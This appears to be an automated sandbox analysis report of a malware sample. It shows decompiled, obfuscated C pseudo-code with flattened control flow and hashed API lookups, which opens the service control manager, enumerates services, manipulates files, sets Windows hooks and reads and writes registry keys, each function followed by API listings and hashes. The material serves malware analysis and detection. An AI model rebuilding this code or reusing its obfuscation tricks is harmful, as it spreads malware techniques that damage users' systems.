                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x40;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00001000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 4;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00002000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x80;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00004000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x800;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00008000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x400;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00010000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x200;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00020000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x100;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00040000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x8000;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				_t191 = _v8;
                                                      				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
                                                      				_t139 =  *(_t191 + 0x18);
                                                      				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
                                                      				if((_t139 & 0x00003fc0) == 0x3fc0) {
                                                      					 *(_t191 + 0x18) = _t139 | 0x00000010;
                                                      					_t201 = _t201 | 0x00000010;
                                                      					__eflags = _t201;
                                                      				}
                                                      				asm("sbb eax, eax");
                                                      				_t144 =  ~((_t201 & _a4) - _a4) + 1;
                                                      				__eflags = _t144;
                                                      				return _t144;
                                                      			}





























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: _memset
                                                      • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                      • API String ID: 2102423945-4122032997
                                                      • Opcode ID: af90f3d793df6aa5d0f43c2ff2de7d4dbca73bf6dbea27fcc50b6289e62f7852
                                                      • Instruction ID: e6b970e612583588a719d793e0dd92c83582657bdf5cb49032b9efa87aaaa162
                                                      • Opcode Fuzzy Hash: af90f3d793df6aa5d0f43c2ff2de7d4dbca73bf6dbea27fcc50b6289e62f7852
                                                      • Instruction Fuzzy Hash: C3810171D00219AADB50DFA4C4C5BDEBBF9AF08344F24817AF914F62C1E7789A44CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E022567ED() {
                                                      				char _v524;
                                                      				void* _v528;
                                                      				char _v536;
                                                      				void* _v544;
                                                      				void* _t11;
                                                      				intOrPtr _t12;
                                                      				intOrPtr _t21;
                                                      				void* _t23;
                                                      				intOrPtr _t24;
                                                      				intOrPtr _t28;
                                                      				intOrPtr _t29;
                                                      				void* _t33;
                                                      				void* _t34;
                                                      				intOrPtr _t43;
                                                      				intOrPtr _t48;
                                                      				void* _t60;
                                                      				short* _t61;
                                                      				void* _t64;
                                                      
                                                      				_t34 = _v528;
                                                      				_t11 = 0x2b1f137a;
                                                      				_t61 = 0;
                                                      				goto L1;
                                                      				do {
                                                      					while(1) {
                                                      						L1:
                                                      						_t64 = _t11 - 0x22afb69c;
                                                      						if(_t64 > 0) {
                                                      							break;
                                                      						}
                                                      						if(_t64 == 0) {
                                                      							_t21 =  *0x225a4c4; // 0x605958
                                                      							_t60 = 0x1c;
                                                      							 *((intOrPtr*)(_t21 + 0x250)) = 0x2255793;
                                                      							L14:
                                                      							_t11 = 0x9076f63;
                                                      							continue;
                                                      						}
                                                      						if(_t11 == 0x502f5b) {
                                                      							E02252F84(0x4836b0ed, 0x7fd8698, 0x1c5);
                                                      							_t23 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                      							_t34 = _t23;
                                                      							if(_t34 == 0) {
                                                      								_t11 = 0x22afb69c;
                                                      							} else {
                                                      								_t24 =  *0x225a4c4; // 0x605958
                                                      								 *((intOrPtr*)(_t24 + 0x264)) = 1;
                                                      								_t11 = 0x4ef3871;
                                                      							}
                                                      							continue;
                                                      						}
                                                      						if(_t11 == 0xa04584) {
                                                      							_push(0x104);
                                                      							_push( &_v524);
                                                      							_push(0);
                                                      							 *((intOrPtr*)(E02252F84(0xf568ce83, 0x738e43f2, 0x169)))();
                                                      							_t28 = E02252C80( &_v536);
                                                      							_t43 =  *0x225a4c4; // 0x605958
                                                      							 *((intOrPtr*)(_t43 + 0x268)) = _t28;
                                                      							_t11 = 0x34cf5423;
                                                      							continue;
                                                      						}
                                                      						if(_t11 == 0x4ef3871) {
                                                      							_t60 = 0x29;
                                                      							_t11 = 0x2edd9354;
                                                      							continue;
                                                      						}
                                                      						if(_t11 != 0x9076f63) {
                                                      							goto L26;
                                                      						}
                                                      						_t29 =  *0x225a4c4; // 0x605958
                                                      						_push(_t29 + 0x26c);
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(_t60);
                                                      						_push(0);
                                                      						 *((intOrPtr*)(E02252F84(0xb7924d94, 0x1a51d89f, 0x269)))(); // executed
                                                      						_t33 = 1;
                                                      						_t61 =  ==  ? _t33 : _t61;
                                                      						_t11 = 0x33b48501;
                                                      					}
                                                      					if(_t11 == 0x2b1f137a) {
                                                      						_t12 = E02253037(0x478);
                                                      						 *0x225a4c4 = _t12;
                                                      						if(_t12 == 0) {
                                                      							_t11 = 0x3b5a6d9f;
                                                      							goto L26;
                                                      						}
                                                      						 *((intOrPtr*)(_t12 + 0x24c)) = E02255798;
                                                      						_t11 = 0x502f5b;
                                                      						goto L1;
                                                      					}
                                                      					if(_t11 == 0x2edd9354) {
                                                      						_push(_t34);
                                                      						 *((intOrPtr*)(E02252F84(0x4836b0ed, 0x28c81fb9, 0x11c)))();
                                                      						goto L14;
                                                      					}
                                                      					if(_t11 == 0x33b48501) {
                                                      						E02255667();
                                                      						_t11 = 0xa04584;
                                                      						goto L1;
                                                      					}
                                                      					if(_t11 != 0x34cf5423) {
                                                      						goto L26;
                                                      					}
                                                      					_push( &_v524);
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push(0x25);
                                                      					_push(0);
                                                      					 *((intOrPtr*)(E02252F84(0xb7924d94, 0x1a51d89f, 0x269)))();
                                                      					_t48 =  *0x225a4c4; // 0x605958
                                                      					E02252473(_t48 + 0x228);
                                                      					L20:
                                                      					return _t61;
                                                      					L26:
                                                      				} while (_t11 != 0x3b5a6d9f);
                                                      				goto L20;
                                                      			}






















                                                      APIs
                                                      • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,?,2895FB0B,?,?), ref: 022568D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: XY`$[/P$[/P
                                                      • API String ID: 1889721586-340891843
                                                      • Opcode ID: 65d5f30dfcab75d950e63bd1c1ee661f6e76726f47f1980b045e501b162aa5c0
                                                      • Instruction ID: c0e0b5dd15cc14a3e5f09f5b380cb958b703c25ab9464fefd9547397ef43e717
                                                      • Opcode Fuzzy Hash: 65d5f30dfcab75d950e63bd1c1ee661f6e76726f47f1980b045e501b162aa5c0
                                                      • Instruction Fuzzy Hash: 1F41C0703683265BD23C55D8EC9CA39369DC740364FD4CA2BFD05DB2C8CE7AD8458A21
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00403A3A(intOrPtr __ecx) {
                                                      				void* _v8;
                                                      				char _v12;
                                                      				int _v16;
                                                      				intOrPtr _v20;
                                                      				int _v24;
                                                      				long _t29;
                                                      				char* _t30;
                                                      				intOrPtr _t32;
                                                      				char** _t34;
                                                      				signed int _t39;
                                                      				char** _t43;
                                                      				char* _t45;
                                                      
                                                      				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
                                                      				_t45 =  *0x44251c; // 0x435040
                                                      				_v20 = __ecx;
                                                      				_v8 = 0;
                                                      				_v12 = 0;
                                                      				_v24 = 4;
                                                      				_v16 = 0;
                                                      				_t34 = 0x44251c;
                                                      				if(_t45 == 0) {
                                                      					L14:
                                                      					return 1;
                                                      				}
                                                      				do {
                                                      					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
                                                      					if(_t29 != 0) {
                                                      						goto L12;
                                                      					}
                                                      					_t43 = _t34[1];
                                                      					while(1) {
                                                      						_t30 =  *_t43;
                                                      						if(_t30 == 0) {
                                                      							break;
                                                      						}
                                                      						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
                                                      							_t39 = _t43[1];
                                                      							_t32 = _v20;
                                                      							if(_v12 == 0) {
                                                      								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
                                                      							} else {
                                                      								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
                                                      							}
                                                      						}
                                                      						_v12 = 0;
                                                      						_v24 = 4;
                                                      						_v16 = 0;
                                                      						_t43 =  &(_t43[2]);
                                                      					}
                                                      					RegCloseKey(_v8);
                                                      					_v8 = 0;
                                                      					L12:
                                                      					_t34 =  &(_t34[2]);
                                                      				} while ( *_t34 != 0);
                                                      				goto L14;
                                                      			}
















                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000001,@PC,00000000,00000001,?), ref: 00403A7D
                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00403A9D
                                                      • RegCloseKey.ADVAPI32(?), ref: 00403AE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: @PC
                                                      • API String ID: 3677997916-3669301676
                                                      • Opcode ID: 7e3950ef7bce093945acdd9d3cc986913b746b0efde1205527eef0e1a10a9443
                                                      • Instruction ID: ba0bfb9c3578450b4f1f1542634a8380ad0c35d974bf2591f2b7a0502db76563
                                                      • Opcode Fuzzy Hash: 7e3950ef7bce093945acdd9d3cc986913b746b0efde1205527eef0e1a10a9443
                                                      • Instruction Fuzzy Hash: CF2107B1E10208EFDB15CF85D944AAEBBB8FF91706F1440AAE591B6290D3795B00CF25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E0225390F(void* __ecx, intOrPtr __edx) {
                                                      				char _v4;
                                                      				char _v8;
                                                      				short** _v12;
                                                      				void* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _v28;
                                                      				intOrPtr _v36;
                                                      				signed int _v52;
                                                      				intOrPtr _v60;
                                                      				intOrPtr _t18;
                                                      				void* _t20;
                                                      				signed int _t32;
                                                      				short** _t39;
                                                      				void* _t42;
                                                      				intOrPtr _t60;
                                                      				intOrPtr _t68;
                                                      				signed int _t69;
                                                      				intOrPtr _t73;
                                                      				void* _t76;
                                                      
                                                      				_t42 = __ecx;
                                                      				_t39 = _v12;
                                                      				_t68 = 0;
                                                      				_v24 = __edx;
                                                      				_v28 = __ecx;
                                                      				_t69 = 0x11ae28fa;
                                                      				_t73 = 0;
                                                      				while(1) {
                                                      					L1:
                                                      					_t18 = _v20;
                                                      					while(1) {
                                                      						_t76 = _t69 - 0x190cb621;
                                                      						if(_t76 > 0) {
                                                      							goto L18;
                                                      						}
                                                      						L3:
                                                      						if(_t76 == 0) {
                                                      							_t39 =  &(_t39[0xb]);
                                                      							asm("sbb esi, esi");
                                                      							_t69 = (_t69 & 0x19191b5f) + 0x153c083a;
                                                      							continue;
                                                      						} else {
                                                      							if(_t69 == 0x33f245d) {
                                                      								_push(0);
                                                      								_push(0);
                                                      								_push( &_v12);
                                                      								_push( &_v8);
                                                      								_push(0x20000);
                                                      								_push(_t68);
                                                      								_push(3);
                                                      								_push(0x30);
                                                      								_push(0);
                                                      								_push(_t42);
                                                      								if( *((intOrPtr*)(E02252F84(0x4836b0ed, 0xa10b62f, 0x106)))() == 0) {
                                                      									goto L14;
                                                      								} else {
                                                      									_t32 =  *((intOrPtr*)(E02252F84(0xf568ce83, 0xd6a8b600, 0x1a7)))();
                                                      									_t69 = 0x2e552399;
                                                      									_t18 = _v52 * 0x2c + _t68;
                                                      									_v60 = _t18;
                                                      									_t39 =  >=  ? _t68 : (_t32 & 0x0000001f) * 0x2c + _t68;
                                                      								}
                                                      								goto L11;
                                                      							} else {
                                                      								if(_t69 == 0x59713bc) {
                                                      									return E02252FDF(_t68);
                                                      								}
                                                      								if(_t69 == 0x79d7c1a) {
                                                      									_push(_t73);
                                                      									_push(1);
                                                      									_push(_t60);
                                                      									 *((intOrPtr*)(E02252F84(0x4836b0ed, 0x1893f270, 0x79)))();
                                                      									L14:
                                                      									_t69 = 0x153c083a;
                                                      									goto L10;
                                                      								} else {
                                                      									if(_t69 == 0x11ae28fa) {
                                                      										_t69 = 0x3ae9e7e3;
                                                      										continue;
                                                      									} else {
                                                      										if(_t69 != 0x153c083a) {
                                                      											L30:
                                                      											if(_t69 != 0x7f67b30) {
                                                      												goto L1;
                                                      											}
                                                      										} else {
                                                      											E02252FDF(_t73);
                                                      											_t69 = 0x59713bc;
                                                      											L10:
                                                      											_t18 = _v20;
                                                      											L11:
                                                      											_t42 = _v28;
                                                      											_t60 = _v24;
                                                      											while(1) {
                                                      												_t76 = _t69 - 0x190cb621;
                                                      												if(_t76 > 0) {
                                                      													goto L18;
                                                      												}
                                                      												goto L3;
                                                      											}
                                                      											goto L18;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L33:
                                                      						return _t18;
                                                      						L18:
                                                      						if(_t69 == 0x2dd58528) {
                                                      							_t18 = E02253037(0x2000);
                                                      							_t73 = _t18;
                                                      							if(_t73 == 0) {
                                                      								_t69 = 0x59713bc;
                                                      								goto L29;
                                                      							} else {
                                                      								_t69 = 0x33f245d;
                                                      								goto L10;
                                                      							}
                                                      						} else {
                                                      							if(_t69 == 0x2e552399) {
                                                      								E02252F84(0x4836b0ed, 0x58a5cab0, 0x1a0);
                                                      								_t20 = OpenServiceW(_t42,  *_t39, 1); // executed
                                                      								_v16 = _t20;
                                                      								_t69 =  !=  ? 0x3ab1752b : 0x190cb621;
                                                      								goto L10;
                                                      							} else {
                                                      								_t18 = 0x3ab1752b;
                                                      								if(_t69 == 0x3ab1752b) {
                                                      									_push( &_v4);
                                                      									_push(0x2000);
                                                      									_push(_t73);
                                                      									_push(1);
                                                      									_push(_v16);
                                                      									 *((intOrPtr*)(E02252F84(0x4836b0ed, 0x90d621c8, 0x1c2)))();
                                                      									_push(_v36);
                                                      									asm("sbb esi, esi");
                                                      									_t69 = (_t69 & 0xee90c5f9) + 0x190cb621;
                                                      									_t18 =  *((intOrPtr*)(E02252F84(0x4836b0ed, 0x28c81fb9, 0x11c)))();
                                                      									L29:
                                                      									_t60 = _v24;
                                                      									_t42 = _v28;
                                                      									goto L30;
                                                      								} else {
                                                      									if(_t69 != 0x3ae9e7e3) {
                                                      										goto L30;
                                                      									} else {
                                                      										_t18 = E02253037(0x20000);
                                                      										_t68 = 0x3ab1752b;
                                                      										if(0x3ab1752b != 0) {
                                                      											_t69 = 0x2dd58528;
                                                      											goto L10;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L33;
                                                      					}
                                                      				}
                                                      			}























                                                      0x02253ac7
                                                      0x02253ad3
                                                      0x02253b2a
                                                      0x02253b2a
                                                      0x02253b2e
                                                      0x00000000
                                                      0x02253a58
                                                      0x02253a5e
                                                      0x00000000
                                                      0x02253a64
                                                      0x02253a69
                                                      0x02253a6e
                                                      0x02253a72
                                                      0x02253a78
                                                      0x00000000
                                                      0x02253a78
                                                      0x02253a72
                                                      0x02253a5e
                                                      0x02253a56
                                                      0x02253a49
                                                      0x00000000
                                                      0x02253a3d
                                                      0x0225392f

                                                      APIs
                                                      • OpenServiceW.ADVAPI32(2895FB0B,?,00000001,?,00000000,2895FB0B,2895FB0B,?,?,02255F93,?,2895FB0B,?,?), ref: 02253AF1
                                                        • Part of subcall function 02253037: RtlAllocateHeap.NTDLL(00000000,00000008,684DEBFF), ref: 02253067
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeapOpenService
                                                      • String ID: :$:
                                                      • API String ID: 4051131143-1146511642
                                                      • Opcode ID: bc330caa01e0591f354b6ab3558df73477a8fa5cd181cc1f3507411807ba601a
                                                      • Instruction ID: 9635fbb542af09540c069554e5c2ca98591cdf94733ad16486e92284ddba7ae8
                                                      • Opcode Fuzzy Hash: bc330caa01e0591f354b6ab3558df73477a8fa5cd181cc1f3507411807ba601a
                                                      • Instruction Fuzzy Hash: 56419C76A787325BD134E9E85880A7AA1D2EBC4390F09869EFC55B7288DF74CC40C6D2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E022558E8() {
                                                      				short _v524;
                                                      				struct _SECURITY_ATTRIBUTES* _v532;
                                                      				intOrPtr _v536;
                                                      				intOrPtr _v540;
                                                      				intOrPtr _v544;
                                                      				intOrPtr _v548;
                                                      				intOrPtr _v552;
                                                      				intOrPtr _v556;
                                                      				intOrPtr _v560;
                                                      				char _v564;
                                                      				intOrPtr _v568;
                                                      				void* _v572;
                                                      				void* _t21;
                                                      				void* _t31;
                                                      				void* _t32;
                                                      				intOrPtr _t39;
                                                      				struct _SECURITY_ATTRIBUTES* _t43;
                                                      				long _t45;
                                                      				intOrPtr _t54;
                                                      				void* _t58;
                                                      				void* _t63;
                                                      				void** _t67;
                                                      
                                                      				_t67 =  &_v572;
                                                      				_t21 = 0x32a33eae;
                                                      				_t63 = _v572;
                                                      				_t43 = 0;
                                                      				while(1) {
                                                      					L1:
                                                      					while(1) {
                                                      						_t45 = 1;
                                                      						do {
                                                      							L3:
                                                      							while(_t21 != 0x371db1e) {
                                                      								if(_t21 == 0x12ca3564) {
                                                      									_push(_t63);
                                                      									 *((intOrPtr*)(E02252F84(0xf568ce83, 0x2e998fdc, 0x167)))();
                                                      								} else {
                                                      									if(_t21 == 0x28160846) {
                                                      										_t61 = 0xac6e2571;
                                                      										_push( &_v572);
                                                      										 *((intOrPtr*)(E02252F84(0xf568ce83, 0xac6e2571, 0x1fb)))();
                                                      										_t21 = 0x371db1e;
                                                      										_t45 = 1;
                                                      										continue;
                                                      									} else {
                                                      										if(_t21 == 0x32a33eae) {
                                                      											_t21 = 0x28160846;
                                                      											continue;
                                                      										} else {
                                                      											if(_t21 == 0x345cd1a5) {
                                                      												_t61 = 0xb82a8ec3;
                                                      												E02252F84(0xf568ce83, 0xb82a8ec3, 0x1a);
                                                      												_t31 = CreateFileW( &_v524, 0x100, _t45, 0, 3, 0, 0); // executed
                                                      												_t63 = _t31;
                                                      												if(_t63 != 0xffffffff) {
                                                      													_t21 = 0x3aee750b;
                                                      													while(1) {
                                                      														_t45 = 1;
                                                      														goto L3;
                                                      													}
                                                      												}
                                                      											} else {
                                                      												if(_t21 == 0x3690e992) {
                                                      													_t32 = E02252674(0x22598a0);
                                                      													_t54 =  *0x225a4c4; // 0x605958
                                                      													_t65 = _t32;
                                                      													_t61 = 0xb436274a;
                                                      													_t14 = _t54 + 8; // 0x605960
                                                      													_t15 = _t54 + 0x26c; // 0x605bc4
                                                      													_push(_t32);
                                                      													_push(0x104);
                                                      													_push( &_v524);
                                                      													 *((intOrPtr*)(E02252F84(0xa83808e5, 0xb436274a, 0x156)))();
                                                      													_t67 =  &(_t67[5]);
                                                      													E02252FDF(_t65);
                                                      													_t21 = 0x345cd1a5;
                                                      													goto L1;
                                                      												} else {
                                                      													if(_t21 != 0x3aee750b) {
                                                      														goto L17;
                                                      													} else {
                                                      														_t39 = _v568;
                                                      														_t61 = 0x45b3a231;
                                                      														_t58 = _v572;
                                                      														_push(0x28);
                                                      														_v560 = _t39;
                                                      														_v552 = _t39;
                                                      														_v544 = _t39;
                                                      														_v536 = _t39;
                                                      														_push( &_v564);
                                                      														_push(0);
                                                      														_v564 = _t58;
                                                      														_v556 = _t58;
                                                      														_v548 = _t58;
                                                      														_v540 = _t58;
                                                      														_push(_t63);
                                                      														_v532 = 0;
                                                      														 *((intOrPtr*)(E02252F84(0xf568ce83, 0x45b3a231, 0x289)))(); // executed
                                                      														_t21 = 0x12ca3564;
                                                      														_t45 = 1;
                                                      														_t43 =  !=  ? _t45 : _t43;
                                                      														continue;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								L20:
                                                      								return _t43;
                                                      							}
                                                      							_v572 = _v572 - E0225438D(_t45, _t61);
                                                      							_t21 = 0x3690e992;
                                                      							asm("sbb [esp+0x14], edx");
                                                      							_t45 = 1;
                                                      							L17:
                                                      						} while (_t21 != 0xf34c2b9);
                                                      						goto L20;
                                                      					}
                                                      				}
                                                      			}


























                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 02255997
                                                      • CreateFileW.KERNELBASE(?,00000100,00000001,00000000,00000003,00000000,00000000), ref: 02255A1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: File$CreateHandleInformation
                                                      • String ID: XY`
                                                      • API String ID: 3667790775-3139772767
                                                      • Opcode ID: 76c254fc68a97178e7ccfad838023829f7490a774c45af43fd42c219bb120b09
                                                      • Instruction ID: 91b7ee44c74d586594d9864eb7ed928bcbbee4034d6d25a64fe458a571b03980
                                                      • Opcode Fuzzy Hash: 76c254fc68a97178e7ccfad838023829f7490a774c45af43fd42c219bb120b09
                                                      • Instruction Fuzzy Hash: EC418C306283219FC724DAE89894A3FB6D99B84724F94892FFD45C72C4DB78C945CB93
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E0040B748(void* __edi, void* __eflags) {
                                                      				intOrPtr _v0;
                                                      				void* __esi;
                                                      				struct HHOOK__* _t6;
                                                      				void* _t8;
                                                      				void* _t10;
                                                      				intOrPtr _t11;
                                                      				void* _t13;
                                                      				struct HHOOK__* _t14;
                                                      
                                                      				_t10 = __edi;
                                                      				_push(0x4037fd);
                                                      				_t6 = E0040F584(_t8, 0x44642c, __edi, _t13, __eflags);
                                                      				_t14 = _t6;
                                                      				_t16 = _t14;
                                                      				if(_t14 == 0) {
                                                      					_t6 = E004037E3(_t8, 0x44642c, __edi, _t14, _t16);
                                                      				}
                                                      				_push(_t10);
                                                      				_t11 = _v0;
                                                      				if( *((intOrPtr*)(_t14 + 0x14)) != _t11) {
                                                      					if( *(_t14 + 0x28) == 0) {
                                                      						_t6 = SetWindowsHookExA(5, E0040B4F5, 0, GetCurrentThreadId()); // executed
                                                      						_t19 = _t6;
                                                      						 *(_t14 + 0x28) = _t6;
                                                      						if(_t6 == 0) {
                                                      							_t6 = E004037AF(_t8, 0x44642c, _t11, _t14, _t19);
                                                      						}
                                                      					}
                                                      					 *((intOrPtr*)(_t14 + 0x14)) = _t11;
                                                      				}
                                                      				return _t6;
                                                      			}












                                                      APIs
                                                        • Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B
                                                      • GetCurrentThreadId.KERNEL32 ref: 0040B773
                                                      • SetWindowsHookExA.USER32 ref: 0040B783
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3$CurrentException@8HookThreadThrowWindows
                                                      • String ID: ,dD
                                                      • API String ID: 1415497866-3191229884
                                                      • Opcode ID: 8f866669248ae714854411d0b957cdf2ed001e559e2ffdcb1c22fb3dcb3eb344
                                                      • Instruction ID: f4f6cd2454f4fa9c59ed38751070ba4084f81d528619c841e15a486b9898b3b2
                                                      • Opcode Fuzzy Hash: 8f866669248ae714854411d0b957cdf2ed001e559e2ffdcb1c22fb3dcb3eb344
                                                      • Instruction Fuzzy Hash: 06F0A7B55007115AD7306F16980571BB698DBE4762F11463FF501B72D0D738E94186AE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004024B0(intOrPtr __ecx, char* _a4, char* _a8) {
                                                      				void* _v8;
                                                      				int _v12;
                                                      				int* _v16;
                                                      				int _v20;
                                                      				int _v24;
                                                      				intOrPtr _v28;
                                                      				long _t24;
                                                      				long _t28;
                                                      				int* _t32;
                                                      				char* _t39;
                                                      
                                                      				_v28 = __ecx;
                                                      				_v8 = 0;
                                                      				_v16 = 0;
                                                      				_t39 =  *0x442000; // 0x4346d4
                                                      				_t24 = RegCreateKeyExA(0x80000002, _t39, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12); // executed
                                                      				_v16 = _t24;
                                                      				if(_v16 == 0) {
                                                      					_v24 = 4;
                                                      					 *_a4 = 1;
                                                      					_t28 = RegQueryValueExA(_v8, _a8, 0,  &_v20, _a4,  &_v24); // executed
                                                      					_v16 = _t28;
                                                      					if(_v16 != 0) {
                                                      						_t32 = E00402440(_v28,  *_a4, _a8); // executed
                                                      						_v16 = _t32;
                                                      					}
                                                      					RegCloseKey(_v8);
                                                      				}
                                                      				return _v16;
                                                      			}













                                                      APIs
                                                      • RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00401561,00000000,0043463C), ref: 004024E8
                                                      • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,?,00000000,00000004), ref: 0040251D
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402545
